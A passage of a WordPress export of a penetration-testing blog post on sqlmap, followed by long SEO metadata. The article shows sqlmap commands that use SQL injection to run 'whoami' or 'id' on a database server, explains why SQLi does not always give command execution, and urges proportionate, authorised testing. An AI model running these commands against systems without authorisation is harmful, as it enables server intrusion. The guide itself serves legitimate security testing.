class=\"wp-block-paragraph\">This capability depends on the DBMS, its configuration, the operating system and the privileges of the SQL account.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">It must be used with caution as it alters the environment being audited. Any proof of impact must remain proportionate to the objectives and rules defined for the assignment.<\/p>\n\n\n\n<h3 id=\"run-a-command-with-os-cmd\" class=\"wp-block-heading\">Run a command with \u2013os-cmd<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">In certain configurations, sqlmap can utilise the DBMS\u2019s capabilities to execute a command on the operating system.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">A limited validation test might, for example, use:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python sqlmap.py \\\n  -r request.txt \\\n  --os-cmd=\"whoami\"<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">or, on a Unix system:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python sqlmap.py \\\n  -r request.txt \\\n  --os-cmd=\"id\"<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Sqlmap documents this capability for MySQL, PostgreSQL, Microsoft SQL Server and H2, provided the technical conditions and privileges are met.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Obtaining the output of a command already constitutes significant proof of impact. Any subsequent post-exploitation activities must therefore be directly linked to the authorised scope.<\/p>\n\n\n\n<h3 id=\"why-an-sqli-does-not-automatically-mean-rce\" class=\"wp-block-heading\">Why an SQLi does not automatically mean RCE<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">A common misconception is that a critical SQLi vulnerability necessarily leads to <a href=\"https:\/\/hackagora.com\/en\/rce-remote-code-execution-exploitation-techniques-and-security-best-practices\/\" target=\"_blank\" rel=\"noopener\">command execution<\/a>.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">In reality, several barriers may prevent this. The SQL account may not have administrator privileges. The necessary functions may be disabled. The DBMS may be running under a system user with very limited privileges. The file system may not be accessible. The injection technique itself may also only permit read-only operations.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The impact analysis must therefore clearly distinguish between capabilities that have actually been demonstrated and those that are purely theoretical.<\/p>\n\n\n\n<h2 id=\"how-to-incorporate-sqlmap-into-a-penetration-testing-methodology\" class=\"wp-block-heading\">How to Incorporate SQLmap into a Penetration Testing Methodology?<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Sqlmap is sometimes used as a scanner to which a URL is provided, along with as many options as possible. This approach is neither the most effective nor the most representative of a manual penetration test.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The auditor usually begins by understanding the functionality being tested: what data is sent, how it is processed, what responses are returned, and which parts of the application appear to interact with a database.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">When suspicious behaviour arises, they may manually test a few simple variations to determine whether a particular value actually influences the query. This phase often helps to identify the syntactic context, suspect a particular DBMS, or determine whether a response varies depending on whether a condition is true or false.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Sqlmap then comes into play as an automation tool. It enables the injection point to be confirmed more comprehensively, tests to be reproduced and, above all, operations to be automated that would otherwise require tens, hundreds or thousands of manual queries.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">This approach reduces unnecessary traffic and facilitates diagnosis when the tool fails. It also allows the tester to maintain control over the impact of the test.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">For example, it is not necessary to use:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>--dump-all<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">simply because the option exists. A few rows from a representative table may be sufficient to demonstrate that an attacker could access sensitive information.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Similarly, achieving a controlled execution of \u2018whoami\u2019 or \u2018id\u2019 may be sufficient to demonstrate command execution without needlessly pursuing post-exploitation.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Sqlmap should therefore be regarded as an automation tool supporting a penetration testing methodology, rather than as a substitute for that methodology.<\/p>\n\n\n\n<h2 id=\"conclusion\" class=\"wp-block-heading\">Conclusion<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Sqlmap is one of the leading tools for detecting and exploiting SQL injections. Its power lies primarily in its ability to automate time-consuming and repetitive tasks: testing multiple techniques, identifying the DBMS, exploiting blind SQLi, exploring a database\u2019s structure and retrieving specific information.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">However, its capabilities extend much further. Sqlmap can operate using authenticated queries, manipulate cookies and headers, handle CSRF tokens, replicate second-order injections, or adapt its payloads to specific filtering mechanisms. Where the DBMS and user privileges allow, it can also interact with the file system or execute commands on the server.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">This wealth of functionality should not lead to the tool being used indiscriminately.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">In a penetration test, sqlmap is particularly effective when used following an initial phase of manual analysis. Understanding the vulnerable query, precisely identifying the injection point, selecting the appropriate techniques and limiting the exploitation to the necessary information enables more reliable results whilst reducing traffic and risks to the environment under audit.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Mastering sqlmap therefore does not mean memorising dozens of options. It is primarily about understanding SQL injections well enough to know when, why and how to use each of its features.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>SQL injections are among the long-standing vulnerabilities in web applications. Despite the widespread use of frameworks, ORMs and more secure data access mechanisms, they can still occur when user-controlled data directly influences the structure of a query executed by a database. Manual exploitation remains essential for gaining a precise understanding of an SQLi. It enables [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":4115,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[19,24,25],"tags":[41,38],"class_list":["post-4114","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-applications","category-guides","category-tools","tag-best-practices","tag-pentest"],"blocksy_meta":{"styles_descriptor":{"styles":{"desktop":"","tablet":"","mobile":""},"google_fonts":[],"version":8}},"aioseo_notices":[],"aioseo_head":"\n\t\t<!-- All in One SEO 5.0.2.1 - aioseo.com -->\n\t<meta name=\"description\" content=\"Sqlmap is a tool for detecting and exploiting all types of SQL injections (SQLi). This guide explains how sqlmap works and outlines its key features\" \/>\n\t<meta name=\"robots\" content=\"max-image-preview:large\" \/>\n\t<meta name=\"author\" content=\"Eli T.\"\/>\n\t<link rel=\"canonical\" href=\"https:\/\/hackagora.com\/en\/sqlmap-comprehensive-guide-to-understanding-detecting-and-exploiting-sql-injections-sqli\/\" \/>\n\t<meta name=\"generator\" content=\"All in One SEO (AIOSEO) 5.0.2.1\" \/>\n\t\t<meta property=\"og:locale\" content=\"en_US\" \/>\n\t\t<meta property=\"og:site_name\" content=\"HackAgora \u2013 Expose. Understand. Defend.\" \/>\n\t\t<meta property=\"og:type\" content=\"article\" \/>\n\t\t<meta property=\"og:title\" content=\"SQLmap: Detecting and Exploiting SQL Injections (SQLi)\" \/>\n\t\t<meta property=\"og:description\" content=\"Sqlmap is a tool for detecting and exploiting all types of SQL injections (SQLi). This guide explains how sqlmap works and outlines its key features\" \/>\n\t\t<meta property=\"og:url\" content=\"https:\/\/hackagora.com\/en\/sqlmap-comprehensive-guide-to-understanding-detecting-and-exploiting-sql-injections-sqli\/\" \/>\n\t\t<meta property=\"og:image\" content=\"https:\/\/hackagora.com\/wp-content\/uploads\/2026\/06\/logo_hackagora_agora_color.svg\" \/>\n\t\t<meta property=\"og:image:secure_url\" content=\"https:\/\/hackagora.com\/wp-content\/uploads\/2026\/06\/logo_hackagora_agora_color.svg\" \/>\n\t\t<meta property=\"og:image:width\" content=\"313\" \/>\n\t\t<meta property=\"og:image:height\" content=\"122\" \/>\n\t\t<meta property=\"article:published_time\" content=\"2026-09-23T19:12:26+00:00\" \/>\n\t\t<meta property=\"article:modified_time\" content=\"2026-09-26T12:19:49+00:00\" \/>\n\t\t<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n\t\t<meta name=\"twitter:title\" content=\"SQLmap: Detecting and Exploiting SQL Injections (SQLi)\" \/>\n\t\t<meta name=\"twitter:description\" content=\"Sqlmap is a tool for detecting and exploiting all types of SQL injections (SQLi). This guide explains how sqlmap works and outlines its key features\" \/>\n\t\t<meta name=\"twitter:image\" content=\"https:\/\/hackagora.com\/wp-content\/uploads\/2026\/06\/logo_hackagora_agora_color.svg\" \/>\n\t\t<script type=\"application\/ld+json\" class=\"aioseo-schema\">\n\t\t\t{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"BlogPosting\",\"@id\":\"https:\\\/\\\/hackagora.com\\\/en\\\/sqlmap-comprehensive-guide-to-understanding-detecting-and-exploiting-sql-injections-sqli\\\/#blogposting\",\"name\":\"SQLmap: Detecting and Exploiting SQL Injections (SQLi)\",\"headline\":\"SQLmap: Comprehensive Guide to Understanding, Detecting and Exploiting SQL Injections (SQLi)\",\"author\":{\"@id\":\"https:\\\/\\\/hackagora.com\\\/en\\\/author\\\/traorea_hg\\\/#author\"},\"publisher\":{\"@id\":\"https:\\\/\\\/hackagora.com\\\/en\\\/#organization\"},\"image\":{\"@type\":\"ImageObject\",\"url\":\"https:\\\/\\\/hackagora.com\\\/wp-content\\\/uploads\\\/2026\\\/09\\\/sqlmap-en.svg\",\"width\":885,\"height\":659,\"caption\":\"sqlmap\"},\"datePublished\":\"2026-09-23T19:12:26+00:00\",\"dateModified\":\"2026-09-26T12:19:49+00:00\",\"inLanguage\":\"en-US\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/hackagora.com\\\/en\\\/sqlmap-comprehensive-guide-to-understanding-detecting-and-exploiting-sql-injections-sqli\\\/#webpage\"},\"isPartOf\":{\"@id\":\"https:\\\/\\\/hackagora.com\\\/en\\\/sqlmap-comprehensive-guide-to-understanding-detecting-and-exploiting-sql-injections-sqli\\\/#webpage\"},\"articleSection\":\"Applications, Guides, Tools, best practices, pentest\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/hackagora.com\\\/en\\\/sqlmap-comprehensive-guide-to-understanding-detecting-and-exploiting-sql-injections-sqli\\\/#breadcrumblist\",\"itemListElement\":[{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/hackagora.com\\\/en\\\/#listItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/hackagora.com\\\/en\\\/\",\"nextItem\":{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/hackagora.com\\\/en\\\/category\\\/applications\\\/#listItem\",\"name\":\"Applications\"}},{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/hackagora.com\\\/en\\\/category\\\/applications\\\/#listItem\",\"position\":2,\"name\":\"Applications\",\"item\":\"https:\\\/\\\/hackagora.com\\\/en\\\/category\\\/applications\\\/\",\"nextItem\":{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/hackagora.com\\\/en\\\/sqlmap-comprehensive-guide-to-understanding-detecting-and-exploiting-sql-injections-sqli\\\/#listItem\",\"name\":\"SQLmap: Comprehensive Guide to Understanding, Detecting and Exploiting SQL Injections (SQLi)\"},\"previousItem\":{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/hackagora.com\\\/en\\\/#listItem\",\"name\":\"Home\"}},{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/hackagora.com\\\/en\\\/sqlmap-comprehensive-guide-to-understanding-detecting-and-exploiting-sql-injections-sqli\\\/#listItem\",\"position\":3,\"name\":\"SQLmap: Comprehensive Guide to Understanding, Detecting and Exploiting SQL Injections (SQLi)\",\"previousItem\":{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/hackagora.com\\\/en\\\/category\\\/applications\\\/#listItem\",\"name\":\"Applications\"}}]},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/hackagora.com\\\/en\\\/#organization\",\"name\":\"HackAgora\",\"description\":\"Expose. Understand. Defend.\",\"url\":\"https:\\\/\\\/hackagora.com\\\/en\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"url\":\"https:\\\/\\\/hackagora.com\\\/wp-content\\\/uploads\\\/2026\\\/06\\\/logo_hackagora_agora_color.svg\",\"@id\":\"https:\\\/\\\/hackagora.com\\\/en\\\/sqlmap-comprehensive-guide-to-understanding-detecting-and-exploiting-sql-injections-sqli\\\/#organizationLogo\",\"width\":313,\"height\":122},\"image\":{\"@id\":\"https:\\\/\\\/hackagora.com\\\/en\\\/sqlmap-comprehensive-guide-to-understanding-detecting-and-exploiting-sql-injections-sqli\\\/#organizationLogo\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/hackagora.com\\\/en\\\/author\\\/traorea_hg\\\/#author\",\"url\":\"https:\\\/\\\/hackagora.com\\\/en\\\/author\\\/traorea_hg\\\/\",\"name\":\"Eli T.\",\"image\":{\"@type\":\"ImageObject\",\"@id\":\"https:\\\/\\\/hackagora.com\\\/en\\\/sqlmap-comprehensive-guide-to-understanding-detecting-and-exploiting-sql-injections-sqli\\\/#authorImage\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/748941d304278b11e857c7ae5582eefefe0689f1b0642e56a2eda7b98bae722b?s=96&d=mm&r=g\",\"width\":96,\"height\":96,\"caption\":\"Eli T.\"}},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/hackagora.com\\\/en\\\/sqlmap-comprehensive-guide-to-understanding-detecting-and-exploiting-sql-injections-sqli\\\/#webpage\",\"url\":\"https:\\\/\\\/hackagora.com\\\/en\\\/sqlmap-comprehensive-guide-to-understanding-detecting-and-exploiting-sql-injections-sqli\\\/\",\"name\":\"SQLmap: Detecting and Exploiting SQL Injections (SQLi)\",\"description\":\"Sqlmap is a tool for detecting and exploiting all types of SQL injections (SQLi). This guide explains how sqlmap works and outlines its key features\",\"inLanguage\":\"en-US\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/hackagora.com\\\/en\\\/#website\"},\"breadcrumb\":{\"@id\":\"https:\\\/\\\/hackagora.com\\\/en\\\/sqlmap-comprehensive-guide-to-understanding-detecting-and-exploiting-sql-injections-sqli\\\/#breadcrumblist\"},\"author\":{\"@id\":\"https:\\\/\\\/hackagora.com\\\/en\\\/author\\\/traorea_hg\\\/#author\"},\"creator\":{\"@id\":\"https:\\\/\\\/hackagora.com\\\/en\\\/author\\\/traorea_hg\\\/#author\"},\"image\":{\"@type\":\"ImageObject\",\"url\":\"https:\\\/\\\/hackagora.com\\\/wp-content\\\/uploads\\\/2026\\\/09\\\/sqlmap-en.svg\",\"@id\":\"https:\\\/\\\/hackagora.com\\\/en\\\/sqlmap-comprehensive-guide-to-understanding-detecting-and-exploiting-sql-injections-sqli\\\/#mainImage\",\"width\":885,\"height\":659,\"caption\":\"sqlmap\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/hackagora.com\\\/en\\\/sqlmap-comprehensive-guide-to-understanding-detecting-and-exploiting-sql-injections-sqli\\\/#mainImage\"},\"datePublished\":\"2026-09-23T19:12:26+00:00\",\"dateModified\":\"2026-09-26T12:19:49+00:00\"},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/hackagora.com\\\/en\\\/#website\",\"url\":\"https:\\\/\\\/hackagora.com\\\/en\\\/\",\"name\":\"HackAgora\",\"description\":\"Expose. Understand. Defend.\",\"inLanguage\":\"en-US\",\"publisher\":{\"@id\":\"https:\\\/\\\/hackagora.com\\\/en\\\/#organization\"}}]}\n\t\t<\/script>\n\t\t<!-- All in One SEO -->\n\n","aioseo_head_json":{"title":"SQLmap: Detecting and Exploiting SQL Injections (SQLi)","description":"Sqlmap is a tool for detecting and exploiting all types of SQL injections (SQLi). This guide explains how sqlmap works and outlines its key features","canonical_url":"https:\/\/hackagora.com\/en\/sqlmap-comprehensive-guide-to-understanding-detecting-and-exploiting-sql-injections-sqli\/","robots":"max-image-preview:large","keywords":"","webmasterTools":{"miscellaneous":""},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"BlogPosting","@id":"https:\/\/hackagora.com\/en\/sqlmap-comprehensive-guide-to-understanding-detecting-and-exploiting-sql-injections-sqli\/#blogposting","name":"SQLmap: Detecting and Exploiting SQL Injections (SQLi)","headline":"SQLmap: Comprehensive Guide to Understanding, Detecting and Exploiting SQL Injections (SQLi)","author":{"@id":"https:\/\/hackagora.com\/en\/author\/traorea_hg\/#author"},"publisher":{"@id":"https:\/\/hackagora.com\/en\/#organization"},"image":{"@type":"ImageObject","url":"https:\/\/hackagora.com\/wp-content\/uploads\/2026\/09\/sqlmap-en.svg","width":885,"height":659,"caption":"sqlmap"},"datePublished":"2026-09-23T19:12:26+00:00","dateModified":"2026-09-26T12:19:49+00:00","inLanguage":"en-US","mainEntityOfPage":{"@id":"https:\/\/hackagora.com\/en\/sqlmap-comprehensive-guide-to-understanding-detecting-and-exploiting-sql-injections-sqli\/#webpage"},"isPartOf":{"@id":"https:\/\/hackagora.com\/en\/sqlmap-comprehensive-guide-to-understanding-detecting-and-exploiting-sql-injections-sqli\/#webpage"},"articleSection":"Applications, Guides, Tools, best practices, pentest"},{"@type":"BreadcrumbList","@id":"https:\/\/hackagora.com\/en\/sqlmap-comprehensive-guide-to-understanding-detecting-and-exploiting-sql-injections-sqli\/#breadcrumblist","itemListElement":[{"@type":"ListItem","@id":"https:\/\/hackagora.com\/en\/#listItem","position":1,"name":"Home","item":"https:\/\/hackagora.com\/en\/","nextItem":{"@type":"ListItem","@id":"https:\/\/hackagora.com\/en\/category\/applications\/#listItem","name":"Applications"}},{"@type":"ListItem","@id":"https:\/\/hackagora.com\/en\/category\/applications\/#listItem","position":2,"name":"Applications","item":"https:\/\/hackagora.com\/en\/category\/applications\/","nextItem":{"@type":"ListItem","@id":"https:\/\/hackagora.com\/en\/sqlmap-comprehensive-guide-to-understanding-detecting-and-exploiting-sql-injections-sqli\/#listItem","name":"SQLmap: Comprehensive Guide to Understanding, Detecting and Exploiting SQL Injections (SQLi)"},"previousItem":{"@type":"ListItem","@id":"https:\/\/hackagora.com\/en\/#listItem","name":"Home"}},{"@type":"ListItem","@id":"https:\/\/hackagora.com\/en\/sqlmap-comprehensive-guide-to-understanding-detecting-and-exploiting-sql-injections-sqli\/#listItem","position":3,"name":"SQLmap: Comprehensive Guide to Understanding, Detecting and Exploiting SQL Injections (SQLi)","previousItem":{"@type":"ListItem","@id":"https:\/\/hackagora.com\/en\/category\/applications\/#listItem","name":"Applications"}}]},{"@type":"Organization","@id":"https:\/\/hackagora.com\/en\/#organization","name":"HackAgora","description":"Expose. Understand. Defend.","url":"https:\/\/hackagora.com\/en\/","logo":{"@type":"ImageObject","url":"https:\/\/hackagora.com\/wp-content\/uploads\/2026\/06\/logo_hackagora_agora_color.svg","@id":"https:\/\/hackagora.com\/en\/sqlmap-comprehensive-guide-to-understanding-detecting-and-exploiting-sql-injections-sqli\/#organizationLogo","width":313,"height":122},"image":{"@id":"https:\/\/hackagora.com\/en\/sqlmap-comprehensive-guide-to-understanding-detecting-and-exploiting-sql-injections-sqli\/#organizationLogo"}},{"@type":"Person","@id":"https:\/\/hackagora.com\/en\/author\/traorea_hg\/#author","url":"https:\/\/hackagora.com\/en\/author\/traorea_hg\/","name":"Eli T.","image":{"@type":"ImageObject","@id":"https:\/\/hackagora.com\/en\/sqlmap-comprehensive-guide-to-understanding-detecting-and-exploiting-sql-injections-sqli\/#authorImage","url":"https:\/\/secure.gravatar.com\/avatar\/748941d304278b11e857c7ae5582eefefe0689f1b0642e56a2eda7b98bae722b?s=96&d=mm&r=g","width":96,"height":96,"caption":"Eli T."}},{"@type":"WebPage","@id":"https:\/\/hackagora.com\/en\/sqlmap-comprehensive-guide-to-understanding-detecting-and-exploiting-sql-injections-sqli\/#webpage","url":"https:\/\/hackagora.com\/en\/sqlmap-comprehensive-guide-to-understanding-detecting-and-exploiting-sql-injections-sqli\/","name":"SQLmap: Detecting and Exploiting SQL Injections (SQLi)","description":"Sqlmap is a tool for detecting and exploiting all types of SQL injections (SQLi). This guide explains how sqlmap works and outlines its key features","inLanguage":"en-US","isPartOf":{"@id":"https:\/\/hackagora.com\/en\/#website"},"breadcrumb":{"@id":"https:\/\/hackagora.com\/en\/sqlmap-comprehensive-guide-to-understanding-detecting-and-exploiting-sql-injections-sqli\/#breadcrumblist"},"author":{"@id":"https:\/\/hackagora.com\/en\/author\/traorea_hg\/#author"},"creator":{"@id":"https:\/\/hackagora.com\/en\/author\/traorea_hg\/#author"},"image":{"@type":"ImageObject","url":"https:\/\/hackagora.com\/wp-content\/uploads\/2026\/09\/sqlmap-en.svg","@id":"https:\/\/hackagora.com\/en\/sqlmap-comprehensive-guide-to-understanding-detecting-and-exploiting-sql-injections-sqli\/#mainImage","width":885,"height":659,"caption":"sqlmap"},"primaryImageOfPage":{"@id":"https:\/\/hackagora.com\/en\/sqlmap-comprehensive-guide-to-understanding-detecting-and-exploiting-sql-injections-sqli\/#mainImage"},"datePublished":"2026-09-23T19:12:26+00:00","dateModified":"2026-09-26T12:19:49+00:00"},{"@type":"WebSite","@id":"https:\/\/hackagora.com\/en\/#website","url":"https:\/\/hackagora.com\/en\/","name":"HackAgora","description":"Expose. Understand. Defend.","inLanguage":"en-US","publisher":{"@id":"https:\/\/hackagora.com\/en\/#organization"}}]},"og:locale":"en_US","og:site_name":"HackAgora \u2013 Expose. Understand. Defend.","og:type":"article","og:title":"SQLmap: Detecting and Exploiting SQL Injections (SQLi)","og:description":"Sqlmap is a tool for detecting and exploiting all types of SQL injections (SQLi). This guide explains how sqlmap works and outlines its key features","og:url":"https:\/\/hackagora.com\/en\/sqlmap-comprehensive-guide-to-understanding-detecting-and-exploiting-sql-injections-sqli\/","og:image":"https:\/\/hackagora.com\/wp-content\/uploads\/2026\/06\/logo_hackagora_agora_color.svg","og:image:secure_url":"https:\/\/hackagora.com\/wp-content\/uploads\/2026\/06\/logo_hackagora_agora_color.svg","og:image:width":313,"og:image:height":122,"article:published_time":"2026-09-23T19:12:26+00:00","article:modified_time":"2026-09-26T12:19:49+00:00","twitter:card":"summary_large_image","twitter:title":"SQLmap: Detecting and Exploiting SQL Injections (SQLi)","twitter:description":"Sqlmap is a tool for detecting and exploiting all types of SQL injections (SQLi). This guide explains how sqlmap works and outlines its key features","twitter:image":"https:\/\/hackagora.com\/wp-content\/uploads\/2026\/06\/logo_hackagora_agora_color.svg"},"aioseo_meta_data":{"post_id":"4114","title":"SQLmap: Detecting and Exploiting SQL Injections (SQLi)","description":"Sqlmap is a tool for detecting and exploiting all types of SQL injections (SQLi). This guide explains how sqlmap works and outlines its key features","keywords":null,"keyphrases":{"focus":{"keyphrase":"sqlmap","score":0,"analysis":[]},"additional":[]},"primary_term":null,"canonical_url":null,"og_title":null,"og_description":null,"og_object_type":"default","og_image_type":"default","og_image_custom_url":null,"og_image_custom_fields":null,"og_image_url":null,"og_image_width":null,"og_image_height":null,"og_video":"","og_custom_url":null,"og_article_section":null,"og_article_tags":null,"twitter_use_og":false,"twitter_card":"default","twitter_image_type":"default","twitter_image_custom_url":null,"twitter_image_custom_fields":null,"twitter_image_url":null,"twitter_title":null,"twitter_description":null,"schema_type":"default","schema_type_options":null,"schema":{"blockGraphs":[],"customGraphs":[],"default":{"data":{"Article":[],"Course":[],"Dataset":[],"FAQPage":[],"Movie":[],"Person":[],"Product":[],"ProductReview":[],"Car":[],"Recipe":[],"Service":[],"SoftwareApplication":[],"WebPage":[]},"graphName":"BlogPosting","isEnabled":true},"graphs":[]},"pillar_content":false,"robots_default":true,"robots_noindex":false,"robots_noarchive":false,"robots_nosnippet":false,"robots_nofollow":false,"robots_noimageindex":false,"robots_noodp":false,"robots_notranslate":false,"robots_max_snippet":"-1","robots_max_videopreview":"-1","robots_max_imagepreview":"large","priority":null,"frequency":"default","local_seo":null,"limit_modified_date":false,"ai":{"faqs":[],"keyPoints":[],"schemas":[],"titles":[],"descriptions":[],"socialPosts":{"email":{"subject":"","preview":"","content":""},"linkedin":[],"twitter":[],"facebook":[],"instagram":[]}},"breadcrumb_settings":null,"seo_analyzer_scan_date":null,"created":"2026-09-24 20:24:40","updated":"2026-09-26 15:07:54","focus_keyword":"sqlmap","additional_keywords":null,"truseo_locale":null},"aioseo_breadcrumb":"<div class=\"aioseo-breadcrumbs\"><span class=\"aioseo-breadcrumb\">\n\t\t\t<a href=\"https:\/\/hackagora.com\/en\/\" title=\"Home\">Home<\/a>\n\t\t<\/span><span class=\"aioseo-breadcrumb-separator\">\u00bb<\/span><span class=\"aioseo-breadcrumb\">\n\t\t\t<a href=\"https:\/\/hackagora.com\/en\/category\/applications\/\" title=\"Applications\">Applications<\/a>\n\t\t<\/span><span class=\"aioseo-breadcrumb-separator\">\u00bb<\/span><span class=\"aioseo-breadcrumb\">\n\t\t\tSQLmap: Comprehensive Guide to Understanding, Detecting and Exploiting SQL Injections (SQLi)\n\t\t<\/span><\/div>","aioseo_breadcrumb_json":[{"label":"Home","link":"https:\/\/hackagora.com\/en\/"},{"label":"Applications","link":"https:\/\/hackagora.com\/en\/category\/applications\/"},{"label":"SQLmap: Comprehensive Guide to Understanding, Detecting and Exploiting SQL Injections (SQLi)","link":"https:\/\/hackagora.com\/en\/sqlmap-comprehensive-guide-to-understanding-detecting-and-exploiting-sql-injections-sqli\/"}],"_links":{"self":[{"href":"https:\/\/hackagora.com\/en\/wp-json\/wp\/v2\/posts\/4114","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hackagora.com\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hackagora.com\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hackagora.com\/en\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/hackagora.com\/en\/wp-json\/wp\/v2\/comments?post=4114"}],"version-history":[{"count":14,"href":"https:\/\/hackagora.com\/en\/wp-json\/wp\/v2\/posts\/4114\/revisions"}],"predecessor-version":[{"id":4130,"href":"https:\/\/hackagora.com\/en\/wp-json\/wp\/v2\/posts\/4114\/revisions\/4130"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/hackagora.com\/en\/wp-json\/wp\/v2\/media\/4115"}],"wp:attachment":[{"href":"https:\/\/hackagora.com\/en\/wp-json\/wp\/v2\/media?parent=4114"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/hackagora.com\/en\/wp-json\/wp\/v2\/categories?post=4114"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hackagora.com\/en\/wp-json\/wp\/v2\/tags?post=4114"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}